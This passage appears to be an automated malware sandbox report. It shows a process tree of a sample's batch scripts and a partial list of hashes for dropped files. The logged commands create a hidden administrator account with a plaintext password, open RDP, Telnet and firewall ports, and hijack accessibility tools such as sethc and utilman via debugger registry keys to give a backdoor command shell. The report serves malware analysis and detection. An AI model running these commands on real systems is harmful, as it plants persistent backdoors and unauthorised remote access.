                                                                                                                                                                                                            PID:1864
                                                                                                                                                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                            sc create tlntsvr binPath= tlntsvr.exe
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                              PID:1840
                                                                                                                                                                                                            • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                              sc config tlntsvr start= auto
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                PID:1816
                                                                                                                                                                                                              • C:\Windows\SysWOW64\net.exe
                                                                                                                                                                                                                net start tlntsvr
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                  PID:1496
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                                    C:\Windows\system32\net1 start tlntsvr
                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                      PID:1952
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                    reg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                      PID:1888
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                      reg add "HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "MaxConnectionTime" /t REG_DWORD /d 0x1 /f
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                        PID:1920
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                        reg add "HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "MaxDisconnectionTime" /t REG_DWORD /d 0x0 /f
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                          PID:1884
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                          reg add "HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "MaxIdleTime" /t REG_DWORD /d 0x0 /f
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                            PID:1928
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                            reg add "HKLM\software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v /t REG_DWORD /d 0x0 /f
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                              PID:1776
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                              netsh firewall add portopening TCP 3389 system
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                PID:1788
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                netsh firewall add portopening TCP 4899 system
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                  PID:1744
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                  attrib +h +s "C:\Documents and settings\ontar" /S /D
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                  • Views/modifies file attributes
                                                                                                                                                                                                                                  PID:1808
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value | Find "="
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                    PID:1652
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                                      WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value
                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                      PID:1544
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\find.exe
                                                                                                                                                                                                                                      Find "="
                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                        PID:1632
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\net.exe
                                                                                                                                                                                                                                      net user ontar Preaba1! /add /active:"yes" /expires:"never" /passwordchg:"NO"
                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                        PID:2000
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                                                          C:\Windows\system32\net1 user ontar Preaba1! /add /active:"yes" /expires:"never" /passwordchg:"NO"
                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                            PID:1180
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\net.exe
                                                                                                                                                                                                                                          net localgroup Administrators ontar /add
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                            PID:1120
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                                                              C:\Windows\system32\net1 localgroup Administrators ontar /add
                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                PID:468
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value | Find "="
                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                PID:2044
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                                                                                                  WMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value
                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                  PID:824
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\find.exe
                                                                                                                                                                                                                                                  Find "="
                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                    PID:748
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\net.exe
                                                                                                                                                                                                                                                  net localgroup "Remote Desktop Users" ontar /add
                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                    PID:876
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                                                                      C:\Windows\system32\net1 localgroup "Remote Desktop Users" ontar /add
                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                        PID:960
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\net.exe
                                                                                                                                                                                                                                                      net accounts /forcelogoff:no /maxpwage:unlimited
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                        PID:1616
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                                                                                                          C:\Windows\system32\net1 accounts /forcelogoff:no /maxpwage:unlimited
                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                            PID:1600
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                          reg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                            PID:848
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                            reg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                              PID:1472
                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                              reg add "HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "MaxConnectionTime" /t REG_DWORD /d 0x1 /f
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                PID:1860
                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                reg add "HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "MaxDisconnectionTime" /t REG_DWORD /d 0x0 /f
                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                  PID:1488
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                  reg add "HKLM\system\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "MaxIdleTime" /t REG_DWORD /d 0x0 /f
                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                    PID:1512
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                    reg add "HKLM\software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v ontar /t REG_DWORD /d 0x0 /f
                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                    • Modifies WinLogon
                                                                                                                                                                                                                                                                    PID:1804
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                    Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\History\{35378EAC-683F-11D2-A89A-00C04FBBCFA2}\0" /v "Version" /t REG_DWORD /d "196611" /f
                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                      PID:1796
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                      Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\Extension-List\{00000000-0000-0000-0000-000000000000}" /v "StartTimeLo" /t REG_DWORD /d "2386147405" /f
                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                        PID:1832
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                        Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\Extension-List\{00000000-0000-0000-0000-000000000000}" /v "EndTimeLo" /t REG_DWORD /d "2387249407" /f
                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                          PID:1820
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                          Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\State\Machine\GPO-List\0" /v "Version" /t REG_DWORD /d "196611" /f
                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                            PID:1524
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                            Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\Status\GPExtensions\{35378EAC-683F-11D2-A89A-00C04FBBCFA2}" /v "LastPolicyTime" /t REG_DWORD /d "19856934" /f
                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                              PID:1864
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                              Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v "UserAuthentication" /t REG_DWORD /d "0" /f
                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                PID:1836
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0x00000000 /f
                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                  PID:1672
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                  Reg.exe add "HKLM\SYSTEM\ControlSet001\services\SharedAccess\Epoch" /v "Epoch" /t REG_DWORD /d "9412" /f
                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                    PID:1876
                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                    Reg.exe add "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Epoch" /v "Epoch" /t REG_DWORD /d "9412" /f
                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                      PID:1952
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                      Reg.exe add "HKU\S-1-5-21-1252767878-4065156067-3399968500-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count" /v "P:\FUNER\Iveghny\Ertfubg.rkr" /t REG_BINARY /d "1300000002000000100000001a230500000080bf000080bf000080bf000080bf000080bf000080bf000080bf000080bf000080bf000080bfffffffff40e916d87c3bd30100000000" /f
                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                        PID:1592
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                        attrib C:\users\ontar +r +a +s +h
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                        • Views/modifies file attributes
                                                                                                                                                                                                                                                                                        PID:1904
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                        reg add «HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList» /v ontar /t REG_DWORD /d «00000000" /f
                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                          PID:1932
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                        cmd /c ""C:\Users\Admin\AppData\Local\Temp\foo\SH.bat" "
                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                        • Drops file in System32 directory
                                                                                                                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                                                        PID:1832
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\attrib.exe
                                                                                                                                                                                                                                                                                          attrib -h -s -r C:\Windows\system32\dllcache
                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                          • Views/modifies file attributes
                                                                                                                                                                                                                                                                                          PID:1876
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                          Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v "debugger" /t REG_SZ /d "drmsvc.exe" /f
                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                            PID:1912
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                            Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ibhost.exe" /v "debugger" /t REG_SZ /d "drmsvc.exe" /f
                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                              PID:1948
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                              Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /v "debugger" /t REG_SZ /d "wpmsvc.exe" /f
                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                PID:1404
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Narrator.exe" /v "debugger" /t REG_SZ /d "cmd.exe" /f
                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                  PID:1972
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                  Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Magnify.exe" /v "debugger" /t REG_SZ /d "cmd.exe" /f
                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                    PID:1640
                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                    Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\uddisrw.exe" /v "debugger" /t REG_SZ /d "wpmsvc.exe" /f
                                                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                                                      PID:1636
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                                                                                                                                                                                      takeown /F C:\Windows\System32\sethc.exe
                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                      PID:1676
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\takeown.exe
                                                                                                                                                                                                                                                                                                      takeown /F C:\Windows\SysWOW64\sethc.exe
                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                      PID:2020
                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                        PID:1028
                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                                                                                                                        cacls C:\Windows\System32\dllcache\sethc.exe /G :F SYSTEM:F
                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                          PID:1220
                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                            PID:1036
                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                                                                                                                                                                                            cacls C:\Windows\SysWOW64\dllcache\sethc.exe /G :F SYSTEM:F
                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                              PID:552
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" echo y"
                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                PID:568
                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Windows10Upgrade.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                  PID:1616
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                                                                                                                                  Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\EOSNotify.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
                                                                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                                                                    PID:1504
                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\foo\TSPatch.exe
                                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\foo\TSPatch.exe" -silent
                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                  PID:1784

                                                                                                                                                                                                                                                                                                              Network

                                                                                                                                                                                                                                                                                                              MITRE ATT&CK Enterprise v6

                                                                                                                                                                                                                                                                                                              Replay Monitor

                                                                                                                                                                                                                                                                                                              Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                              Downloads

                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\foo\SH.bat

                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                21ef54fce2b94d13c5c8bc294fbc5e11

                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                57a38e4649b34e4bb36b778c17de0804ac418132

                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                896fe05ecf0c6826cb5265a43118fc242ecc7a5457e487a0976a73c514a4a16d

                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                2f539290cb27bd88cdf73e976a9a77de951cdc2f428669bc472470cf9775f7c3e4c351e5eabdafeef074954fdd8efe61096a09dc1f1a2ee4ba72426e263378c7

                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\foo\TSPatch.exe

                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                c558680a720c1e3a317ae3ee9e4bdfda

                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                a23b18726297c80b89e3de588666d116920c8f10

                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                8c66a900102db758830c47c9e32076fabace6d81bc9ae0b50ba448880f5f1ff8

                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                0bc22482c9cf8192a68dcc6c796c7316989f233142ee9ce906dd9408a05dd2c25598d33eaf79e6eccb5d23f95e57948fdfb706b26cf92a839b473e7b24d6955f

                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\foo\U.bat

                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                1fae59414d8f21e40d105f47f6b23edd

                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                c157832a5322d53130fa1e568abf7b66e2ae87cc

                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                d58f99d63f3306ccc68130af6cd7e539198e26b0ce2cb647b3ac710b974cec7e

                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                c579e56e3f449bcfc50c9d32f85bb55a0e2fd34d54146654188c38f7c2af529a04c9471afab10bf1c529cae9ef0c185a8712cf626c8c84a306dc3758dc29b538

                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\foo\prop.exe

                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                48522d32f014350cb5b8d55ca8b52678

                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                4b84fedea40c4db502427cbc9e0ceffb18bf7033

                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                7b0fd59157936cbaa2fe204fba06b22f11bfc5373aa7ea918a5c0e42035094bd

                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                05bddf16831b456a66936af181bac73e23131e2d0698db0d1a93b51c60fdaedff1a389e6adf3cb619921211147ce54ca6c5be25dab4c79169e914dcc0b2a50ae

                                                                                                                                                                                                                                                                                                              • \??\PIPE\lsarpc

                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                d41d8cd98f00b204e9800998ecf8427e

                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                                                                                                                                                                                                                                                              • \??\PIPE\lsarpc

                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                d41d8cd98f00b204e9800998ecf8427e

                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                                                                                                                                                                                                                                                              • \??\PIPE\lsarpc

                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                d41d8cd98f00b204e9800998ecf8427e

                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                                                                                                                                                                                                                                                              • \??\PIPE\lsarpc

                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                d41d8cd98f00b204e9800998ecf8427e

                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                                                                                                                                                                                                                                                              • \??\PIPE\samr

                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                d41d8cd98f00b204e9800998ecf8427e

                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                                                                                                                                                                                                                                                              • \??\PIPE\samr

                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                d41d8cd98f00b204e9800998ecf8427e

                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                                                                                                                                                                                                                                                              • \??\PIPE\samr

                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                d41d8cd98f00b204e9800998ecf8427e

                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                                                                                                                                                                                                                                                              • \??\PIPE\samr

                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                d41d8cd98f00b204e9800998ecf8427e

                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                                                                                                                                                                                                                                                              • \??\PIPE\samr

                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                d41d8cd98f00b204e9800998ecf8427e

                                                                                                                                                                                                                                                                                                                SHA1

